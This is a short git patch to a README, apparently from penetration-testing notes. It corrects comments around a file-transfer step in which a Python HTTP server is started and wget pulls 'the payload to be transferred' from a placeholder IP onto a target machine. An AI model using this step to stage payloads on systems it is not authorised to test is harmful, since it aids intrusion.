From 8c4cf37564b48fd08adf7e51ed3a98fc59bb4384 Mon Sep 17 00:00:00 2001 From: Joe Totes <59018247+Totes5706@users.noreply.github.com> Date: Sat, 30 Jul 2022 16:11:47 -0400 Subject: [PATCH] Update README.md --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index e18f10a..7339b05 100644 --- a/README.md +++ b/README.md @@ -277,8 +277,8 @@ sudo python3 -m http.server {PORT} # Usage - Download on server machine wget http://{IP ADDRESS}/{FILE} -outfile {FILE} -# {IP ADDRESS}: Python Server IP Address from step one -# {FILE}: The payload to be trasnfered +# {IP ADDRESS}: IP Address of the client from step one (python server) +# {FILE}: The payload to be transferred ```